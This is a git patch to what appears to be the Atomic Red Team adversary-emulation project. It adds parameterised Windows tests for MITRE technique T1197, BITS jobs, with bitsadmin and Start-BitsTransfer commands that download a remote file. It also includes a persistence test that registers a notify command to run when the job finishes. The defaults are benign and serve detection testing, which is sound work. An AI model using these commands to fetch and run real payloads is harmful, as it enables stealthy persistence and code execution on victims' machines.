From 9a487bd26adb9e2ad904bfd9409d368f9babbf8b Mon Sep 17 00:00:00 2001
From: Tony M Lambert <ForensicITGuy@users.noreply.github.com>
Date: Tue, 4 Dec 2018 18:38:19 -0600
Subject: [PATCH] Added test for persistence via BITS (#409)

---
 atomics/T1197/T1197.yaml | 57 ++++++++++++++++++++++++++++++++++++++--
 1 file changed, 55 insertions(+), 2 deletions(-)

diff --git a/atomics/T1197/T1197.yaml b/atomics/T1197/T1197.yaml
index 5381976f..ae4cf573 100644
--- a/atomics/T1197/T1197.yaml
+++ b/atomics/T1197/T1197.yaml
@@ -10,17 +10,70 @@ atomic_tests:
 
   supported_platforms:
     - windows
+  input_arguments:
+    remote_file:
+      description: Remote file to download
+      type: url
+      default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md
+    local_file:
+      description: Local file path to save downloaded file
+      type: path
+      default: C:\Windows\Temp\bitsadmin_flag.ps1
   executor:
     name: command_prompt
     command: |
-      bitsadmin.exe  /transfer /Download /priority Foreground https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md %TEMP%\bitsadmin_flag.ps1
+      bitsadmin.exe  /transfer /Download /priority Foreground #{remote_file} #{local_file}
 - name: Download & Execute via PowerShell BITS
   description: |
     This test simulates an adversary leveraging bitsadmin.exe to download
     and execute a payload leveraging PowerShell
   supported_platforms:
     - windows
+  input_arguments:
+    remote_file:
+      description: Remote file to download
+      type: url
+      default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md
+    local_file:
+      description: Local file path to save downloaded file
+      type: path
+      default: C:\Windows\Temp\bitsadmin_flag.ps1
   executor:
     name: powershell
     command: |
-      Start-BitsTransfer -Priority foreground -Source https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md -Destination $env:TEMP\AtomicRedTeam\bitsadmin_flag.ps1
+      Start-BitsTransfer -Priority foreground -Source #{remote_file} -Destination #{local_file}
+
+- name: Persist, Download, & Execute
+  description: |
+    This test simulates an adversary leveraging bitsadmin.exe to schedule a BITS transfer 
+    and execute a payload in multiple steps. This job will remain in the BITS queue for 90 days by default if not removed.
+  supported_platforms:
+    - windows
+  input_arguments:
+    bits_job_name:
+      description: Name of BITS job
+      type: string
+      default: AtomicBITS
+    remote_file:
+      description: Remote file to download
+      type: url
+      default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md
+    local_file:
+      description: Local file path to save downloaded file
+      type: path
+      default: C:\Windows\Temp\bitsadmin_flag.ps1
+    command_path:
+      description: Path of command to execute
+      type: path
+      default: C:\Windows\system32\notepad.exe
+    command_line:
+      description: Command line to execute
+      type: string
+      default: notepad.exe C:\Windows\Temp\bitsadmin_flag.ps1
+  executor:
+    name: command_prompt
+    command: |
+      bitsadmin.exe /create #{bits_job_name}
+      bitsadmin.exe /addfile #{bits_job_name} #{remote_file} #{local_file}
+      bitsadmin.exe /setnotifycmdline #{bits_job_name} #{command_path} #{command_line}
+      bitsadmin.exe /resume #{bits_job_name}
\ No newline at end of file